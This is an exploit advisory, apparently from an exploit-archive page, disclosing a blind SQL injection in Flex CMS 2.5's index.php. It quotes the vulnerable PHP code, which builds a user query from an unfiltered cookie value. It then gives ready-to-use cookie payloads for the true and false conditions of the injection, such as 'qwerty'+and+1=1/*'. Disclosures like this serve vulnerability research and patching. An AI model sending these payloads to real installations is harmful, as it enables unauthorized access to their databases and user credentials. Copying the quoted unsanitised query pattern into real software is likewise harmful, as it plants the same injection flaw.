Flex CMS <= 2.5 (index.php)Blind SQL Injection Vulnerability

2010.03.20
Credit: Inj3ct0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

============================================================ Flex CMS <= 2.5 (index.php)Blind SQL Injection Vulnerability ============================================================ 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 0 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1 #[+] Discovered By : Inj3ct0r #[+] Site : Inj3ct0r.com #[+] Support e-mail : submit[at]inj3ct0r.com Site product: www.flexcms.com Version: 2.5 Requirements: magic_quotes_gpc = off Vulnerability file (index.php) : $CookieData = $HTTP_COOKIE_VARS[$CookieName]; $LoggedIn = 'n'; $UserLevel = 0; if ($CookieData != '' && $CookieData != 'not_logged_in') { list ($CookieUsername, $CookiePassword) = split('==', $CookieData, 2); if ($CookieUsername != '' && $CookiePassword != '') { $query = "select RecordNumber,Level,Password,DisplayName,SessionLen gth from `".$Settings['DBPrefix']."core-Users` where Username='$CookieUsername' LIMIT 1"; $result = mysql_query($query) or die (mysql_error()); In the cookies sent login and pass, in such a login == hash_pass Because the variable $ CookieUsername not filtered and if magic_quotes_gpc = off is the opportunity to inj3ct0r Example: True: FCLoginData12345=qwerty'+and+1=1/*%3D%3DqwDyM1dbqwDyM1db9iOPI False: FCLoginData12345=qwerty'+and+1=2/*%3D%3DqwDyM1dbqwDyM1db9iOPI --------------------------------- # Inj3ct0r.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top